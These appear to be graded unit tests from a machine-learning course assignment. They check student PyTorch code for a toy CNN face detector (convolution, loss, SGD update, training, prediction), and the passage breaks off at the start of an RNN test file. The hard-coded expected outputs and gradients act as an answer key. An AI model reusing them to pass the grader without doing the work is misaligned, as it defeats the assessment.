assert np.allclose(f.data, f_true,atol=0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in f)
L = f.sum()
# back propagation
L.backward()
    # check the gradients of p
dL_dp_true = [[[[1., 1., 1.],
[1., 1., 1.]],
[[1., 1., 1.],
[1., 1., 1.]]],
[[[1., 1., 1.],
[1., 1., 1.]],
[[1., 1., 1.],
[1., 1., 1.]]]]
assert np.allclose(p.grad, dL_dp_true, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,10) # batch size
    h = np.random.randint(5,20) # height of the image
w = np.random.randint(5,20) # width of the image
n_filters = np.random.randint(2,10) # number of filters
p = th.randn(n,n_filters,h,w)
f = flatten(p)
assert np.allclose(f.size(),(n,n_filters*h*w))
#---------------------------------------------------
def test_compute_z3():
''' (2 points) compute_z3'''
# batch_size = 4
# number of input features = 2
# input feature to the second layer on one mini-batch: 4 (batch_size) by 2 (p) matrix
f = th.tensor([[1.,1.], # the first sample in the mini-batch
[2.,2.], # the second sample in the mini-batch
[3.,3.], # the third sample in the mini-batch
[4.,4.]])# the fourth sample in the mini-batch
# weights of length 2
W3 = th.tensor([ 0.5, -0.4],requires_grad=True)
# bias
b3 = th.tensor(-0.3,requires_grad=True)
z3 = compute_z3(f,W3,b3)
assert type(z3) == th.Tensor
assert np.allclose(z3.size(), (4,)) # batch_size
z_true = [-0.2,-0.1, 0.0, 0.1]
assert np.allclose(z3.data,z_true, atol = 1e-2)
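    # (Quick check, assuming z3 = f @ W3 + b3: for the first sample,
    #  1*0.5 + 1*(-0.4) - 0.3 = -0.2, which matches z_true[0].)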
assert z3.requires_grad
# check if the gradients of W is connected to z correctly
L = th.sum(z3) # compute the sum of all elements in z
L.backward() # back propagate gradient to W and b
# now the gradients dL_dW should be
dL_dW_true = [10,10]
# here [10,10] of dL_dW is computed as the sum of the gradients in all the four samples.
# for the 1st sample, the gradient is x = [1,1]
# for the 2nd sample, the gradient is x = [2,2]
# for the 3rd sample, the gradient is x = [3,3]
# for the 4th sample, the gradient is x = [4,4]
# so the sum of the gradients will be [10,10]
assert np.allclose(W3.grad,dL_dW_true, atol=0.1)
# now the gradients of dL_db should be: 4
# here dL_db is computed as the sum of the gradients in all the four samples: 1+1+1+1 = 4
assert np.allclose(b3.grad,4, atol=0.1)
#---------------------------------------------------
def test_forward():
''' (2 points) forward'''
# Let's use a face detector example.
# The shape of the tensors are as follows:
# x: 2x3x10x10 (2 images, 3 channels, 10 height, 10 width)
# Convolutional Layer 1: 3 filters of size 3x3
# z1: 2x3x8x8 (2 images, 3 filter channels, 8 height, 8 width)
# a1: 2x3x8x8 (2 images, 3 filter channels, 8 height, 8 width)
# p1: 2x3x4x4 (2 images, 3 filter channels, 4 height, 4 width)
# Convolutional Layer 2: 2 filters of size 3x3
# z2: 2x2x2x2 (2 images, 2 filter channels, 2 height, 2 width)
# a2: 2x2x2x2 (2 images, 2 filter channels, 2 height, 2 width)
    # p2: 2x2x1x1 (2 images, 2 filter channels, 1 height, 1 width)
# f: 2x2 (2 images, 2 flattened features)
# z3: 2 (2 images)
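    # (Shape sanity check, assuming 'valid' convolutions with stride 1 and 2x2 max pooling with
    #  stride 2: conv output size = input size - filter size + 1 and pooling halves it, so
    #  10 -> 10-3+1=8 -> 8/2=4 -> 4-3+1=2 -> 2/2=1, and the two 1x1 maps flatten to 2 features.)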
x = th.tensor([
#---------- the first image in the mini-batch (face type 1) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the second/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the third/blue channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
],
#---------- the second image in the mini-batch (face type 2) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the second/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the third/blue channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
]
#----------------------------------------------------
])
#---------------------------
# Layer 1: Convolutional layer
#---------------------------
    # 3 filters of shape 3 x 3 with 3 channels (shape: 3 filters x 3 input channels x 3 height x 3 width)
W1= th.tensor( [
#---------- the first filter for 'eye' detector ------
[
[[0.,0.,0.],
[0.,1.,0.],
[1.,0.,1.]], # the first channel (red color) of the filter
[[0.,0.,0.],
[0.,2.,0.],
[2.,0.,2.]], # the second channel (green color) of the filter
[[0.,0.,0.],
[0.,3.,0.],
[3.,0.,3.]] # the third channel (blue color) of the filter
],
#---------- the second filter for 'mouth' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[1.,1.,1.]], # the first channel of the filter
[[0.,0.,0.],
[2.,0.,2.],
[2.,2.,2.]], # the second channel of the filter
[[0.,0.,0.],
[3.,0.,3.],
[3.,3.,3.]] # the third channel of the filter
],
#---------- the third filter for 'eyebrow' detector ------
[
[[1.,1.,1.],
[0.,0.,0.],
[0.,0.,0.]], # the first channel of the filter
[[2.,2.,2.],
[0.,0.,0.],
[0.,0.,0.]], # the second channel of the filter
[[3.,3.,3.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b1= th.tensor([-17., # the bias for the first filter
-29., # the bias for the second filter
-17.], # the bias for the third filter
requires_grad=True)
#---------------------------
# Layer 2: Convolutional layer
#---------------------------
    # 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 input channels x 3 height x 3 width)
W2= th.tensor( [
#---------- the first filter for 'face type 1' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
],
#---------- the second filter for 'face type 2' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[1.,0.,1.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b2= th.tensor([-4., # the bias for the first filter
-4.], # the bias for the second filter
requires_grad=True)
#---------------------------
# Layer 3: Fully-connected layer
#---------------------------
W3 = th.tensor([1., -1.], requires_grad=True)
b3= th.tensor(0.,requires_grad=True)
z3 = forward(x,W1,b1,W2,b2,W3,b3)
# check value
assert type(z3) == Tensor
assert np.allclose(z3.size(),(2,))
z3_true = [1., -1.]
assert np.allclose(z3.data, z3_true)
# check if the gradients are connected correctly
    # create a simple loss function (sum of all elements in z3)
L = z3.sum()
# back propagation
L.backward()
# check the gradients
dL_dW1 = [[[[ 0., 0., -1.],
[ 2., 0., 2.],
[ 0., 0., 0.]],
[[ 0., 0., -1.],
[ 2., 0., 2.],
[ 0., 0., 0.]],
[[ 0., 0., -1.],
[ 2., 0., 2.],
[ 0., 0., 0.]]],
[[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]]],
[[[ 0., 0., 0.],
[ 2., 0., 1.],
[ 0., -2., 0.]],
[[ 0., 0., 0.],
[ 2., 0., 1.],
[ 0., -2., 0.]],
[[ 0., 0., 0.],
[ 2., 0., 1.],
[ 0., -2., 0.]]]]
dL_dW2 = [[[[ 0., 0., 0.],
[ 1., 0., 1.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 1., 0.]],
[[ 0., 0., 0.],
[ 1., 0., 1.],
[ 0., 0., 0.]]],
[[[ 0., 0., 0.],
[-1., 0., -1.],
[ 0., 0., 0.]],
[[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., -1., 0.]],
[[-1., 0., -1.],
[ 0., 0., 0.],
[ 0., 0., 0.]]]]
assert np.allclose(W1.grad, dL_dW1, atol= 0.1)
assert np.allclose(b1.grad, [0,0,0], atol= 0.1)
assert np.allclose(W2.grad, dL_dW2, atol= 0.1)
assert np.allclose(b2.grad, [1,-1], atol= 0.1)
assert np.allclose(W3.grad, [1,1], atol= 0.1)
assert np.allclose(b3.grad, 2, atol= 0.1)
# test the function with random input sizes
n = np.random.randint(2,4) # batch size
s1 = np.random.randint(1,3)*2+1 # size of the filter
s2 = np.random.randint(1,3)*2+1 # size of the filter
c = np.random.randint(2,4) # number of color channels
c1 = np.random.randint(2,4) # number of filters
c2 = np.random.randint(2,4) # number of filters
    h2 = np.random.randint(2,4) # height after second CONV layer
w2 = np.random.randint(2,4)
h1 = h2*2 + s2 - 1
w1 = w2*2 + s2 - 1
    h = h1*2 + s1 - 1 # height of the image
w = w1*2 + s1 - 1 # width of the image
n_flat_features = c2*h2*w2
x = th.randn(n,c,h,w)
W1 = th.randn(c1,c,s1,s1)
b1 = th.randn(c1)
W2 = th.randn(c2,c1,s2,s2)
b2 = th.randn(c2)
W3 = th.randn(n_flat_features)
b3 = th.zeros(1)
z3 = forward(x,W1,b1,W2,b2,W3,b3)
assert np.allclose(z3.size(),(n,))
#---------------------------------------------------
def test_compute_L():
''' (2 points) compute_L'''
# batch_size = 4
# linear logits in a mini-batch
z = th.tensor([1.,-1., -1000, 1000.], requires_grad=True)
# the labels of the mini-batch: vector of length 4 (batch_size)
y = th.Tensor([0,1,0,1])
L = compute_L(z,y)
assert type(L) == th.Tensor
assert L.requires_grad
assert np.allclose(L.detach().numpy(),0.6566,atol=1e-4)
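    # (Quick check, assuming L is the mean binary cross-entropy over the logits: the two
    #  saturated logits (-1000 with y=0 and 1000 with y=1) contribute ~0 loss, while z=1,y=0
    #  and z=-1,y=1 each contribute log(1+e) ~ 1.3133, so the mean is ~0.6566.)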
# check if the gradients of z is connected to L correctly
    L.backward() # back propagate gradient to z
dL_dz_true = [ 0.1828, -0.1828, 0., 0.]
assert np.allclose(z.grad,dL_dz_true, atol=0.01)
#-----------------------------------------
# batch_size = 2
# linear logits in a mini-batch
z = th.tensor([-1000., 1000.], requires_grad=True)
y = th.Tensor([1,0])
L = compute_L(z,y)
assert L.data >100
assert L.data < float('inf')
    L.backward() # back propagate gradient to z
assert z.grad[0]<0
assert z.grad[1]>0
#---------------------------------------------------
def test_update_parameters():
''' (2 points) update_parameters'''
#---------------------------
# Layer 1: Convolutional layer
#---------------------------
    # 3 filters of shape 3 x 3 with 3 channels (shape: 3 filters x 3 input channels x 3 height x 3 width)
W1= th.tensor( [
#---------- the first filter for 'eye' detector ------
[
[[0.,0.,0.],
[0.,1.,0.],
[1.,0.,1.]], # the first channel (red color) of the filter
[[0.,0.,0.],
[0.,2.,0.],
[2.,0.,2.]], # the second channel (green color) of the filter
[[0.,0.,0.],
[0.,3.,0.],
[3.,0.,3.]] # the third channel (blue color) of the filter
],
#---------- the second filter for 'mouth' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[1.,1.,1.]], # the first channel of the filter
[[0.,0.,0.],
[2.,0.,2.],
[2.,2.,2.]], # the second channel of the filter
[[0.,0.,0.],
[3.,0.,3.],
[3.,3.,3.]] # the third channel of the filter
],
#---------- the third filter for 'eyebrow' detector ------
[
[[1.,1.,1.],
[0.,0.,0.],
[0.,0.,0.]], # the first channel of the filter
[[2.,2.,2.],
[0.,0.,0.],
[0.,0.,0.]], # the second channel of the filter
[[3.,3.,3.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b1= th.tensor([-17., # the bias for the first filter
-29., # the bias for the second filter
-17.], # the bias for the third filter
requires_grad=True)
#---------------------------
# Layer 2: Convolutional layer
#---------------------------
    # 2 filters of shape 3 x 3 with 3 channels (shape: 2 filters x 3 input channels x 3 height x 3 width)
W2= th.tensor( [
#---------- the first filter for 'face type 1' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
],
#---------- the second filter for 'face type 2' detector ------
[
[[0.,0.,0.],
[1.,0.,1.],
[0.,0.,0.]], # the first channel (eye channel) of the filter
[[0.,0.,0.],
[0.,0.,0.],
[0.,1.,0.]], # the second channel (mouth channel) of the filter
[[1.,0.,1.],
[0.,0.,0.],
[0.,0.,0.]] # the third channel (eyebrow channel) of the filter
]
#---------------------------------------------------------
], requires_grad=True)
b2= th.tensor([-4., # the bias for the first filter
-4.], # the bias for the second filter
requires_grad=True)
#---------------------------
# Layer 3: Fully-connected layer
#---------------------------
W3 = th.tensor([1., -1.], requires_grad=True)
b3= th.tensor(0.,requires_grad=True)
# create a toy loss function: the sum of all elements in W1, b1, W2, b2, W3 and b3
L = W1.sum()+b1.sum() + W2.sum() + b2.sum() + W3.sum() + b3.sum()
# back propagation to compute the gradients
L.backward()
# now the gradients for both W1, b1, W2, b2, W3 and b3 are all-ones
# let's try updating the parameters with gradient descent
# create an optimizer for the parameters with learning rate = 0.1
optimizer = th.optim.SGD([W1,b1,W2,b2,W3,b3], lr=0.1)
# now perform gradient descent using SGD
update_parameters(optimizer)
# let's check the new values of the parameters
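    # (Since every gradient is 1 and the learning rate is 0.1, plain SGD should shift each
    #  parameter down by exactly 0.1, and update_parameters should reset the gradients to zero,
    #  as the asserts below verify.)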
W1_new = [[[[-0.1, -0.1, -0.1],
[-0.1, 0.9, -0.1],
[ 0.9, -0.1, 0.9]],
[[-0.1, -0.1, -0.1],
[-0.1, 1.9, -0.1],
[ 1.9, -0.1, 1.9]],
[[-0.1, -0.1, -0.1],
[-0.1, 2.9, -0.1],
[ 2.9, -0.1, 2.9]]],
[[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[ 0.9, 0.9, 0.9]],
[[-0.1, -0.1, -0.1],
[ 1.9, -0.1, 1.9],
[ 1.9, 1.9, 1.9]],
[[-0.1, -0.1, -0.1],
[ 2.9, -0.1, 2.9],
[ 2.9, 2.9, 2.9]]],
[[[ 0.9, 0.9, 0.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]],
[[ 1.9, 1.9, 1.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]],
[[ 2.9, 2.9, 2.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]]]]
b1_new = [-17.1, -29.1, -17.1]
W2_new = [[[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1]],
[[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1],
[-0.1, 0.9, -0.1]],
[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1]]],
[[[-0.1, -0.1, -0.1],
[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1]],
[[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1],
[-0.1, 0.9, -0.1]],
[[ 0.9, -0.1, 0.9],
[-0.1, -0.1, -0.1],
[-0.1, -0.1, -0.1]]]]
b2_new = [-4.1, -4.1]
W3_new = [ 0.9000, -1.1000]
assert np.allclose(W1.data,W1_new,atol=1e-2)
assert np.allclose(b1.data,b1_new,atol=1e-2)
assert np.allclose(W2.data,W2_new,atol=1e-2)
assert np.allclose(b2.data,b2_new,atol=1e-2)
assert np.allclose(W3.data,W3_new,atol=1e-2)
assert np.allclose(b3.data,-0.1,atol=1e-2)
assert np.allclose(W1.grad,np.zeros((3,3,3,3)),atol=1e-2)
assert np.allclose(b1.grad,np.zeros(3),atol=1e-2)
assert np.allclose(W2.grad,np.zeros((2,3,3,3)),atol=1e-2)
assert np.allclose(b2.grad,[0,0],atol=1e-2)
assert np.allclose(W3.grad,[0,0],atol=1e-2)
assert np.allclose(b3.grad,0,atol=1e-2)
#---------------------------------------------------
def test_train():
''' (2 points) train'''
X = th.tensor([
#---------- the first image in the mini-batch (face type 1) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the second/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the third/blue channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
],
#---------- the second image in the mini-batch (face type 2) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the second/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the third/blue channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
]
#----------------------------------------------------
])
Y = [1.,0.]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.tensor(Y)
def __len__(self):
return 2
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
loader = th.utils.data.DataLoader(d, batch_size = 2)
n_success = 0
for _ in range(50):
# train the model
W1,b1,W2,b2,W3,b3 = train(loader,
c=3,
c1=32,
c2=64,
h=10,
w=10,
s1=3,
s2=3,
n_epoch=10)
# test the label prediction
z3= forward(X,W1,b1,W2,b2,W3,b3)
if z3[0]>z3[1]:
n_success +=1
assert n_success > 35
#---------------------------------------------------
def test_predict():
''' (2 points) predict'''
X = th.tensor([
#---------- the first image in the mini-batch (face type 1) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the second/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the third/blue channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
],
#---------- the second image in the mini-batch (face type 2) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the second/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
        # the third/blue channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
]
#----------------------------------------------------
])
Y = [1.,0.]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.tensor(Y)
def __len__(self):
return 2
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
loader = th.utils.data.DataLoader(d, batch_size = 2)
n_success = 0
for _ in range(50):
# train the model
W1,b1,W2,b2,W3,b3 = train(loader,
c=3,
c1=32,
c2=64,
h=10,
w=10,
s1=3,
s2=3,
n_epoch=10)
# test the label prediction
y_predict= predict(X,W1,b1,W2,b2,W3,b3)
if np.allclose(y_predict,[1,0]):
n_success +=1
assert n_success > 39
```
#### File: CS-539-Machine-Learning/homework3/test3.py
```python
from problem3 import *
import sys
import math
import torch as th
from torch.utils.data import Dataset, DataLoader
'''
Unit test 3:
This file includes unit tests for problem3.py.
'''
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 3 (20 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.6 or above
assert sys.version_info[1]>=6
#---------------------------------------------------
def test_compute_zt():
''' (2 points) compute_zt'''
# 2 time sequences of 3 input features at the current time step t
# n = 2, p = 3
xt = th.tensor([
#---------- the first time sequence in the mini-batch at time step t ------
[0.2,0.4,0.6],
#---------- the second time sequence in the mini-batch at time step t ------
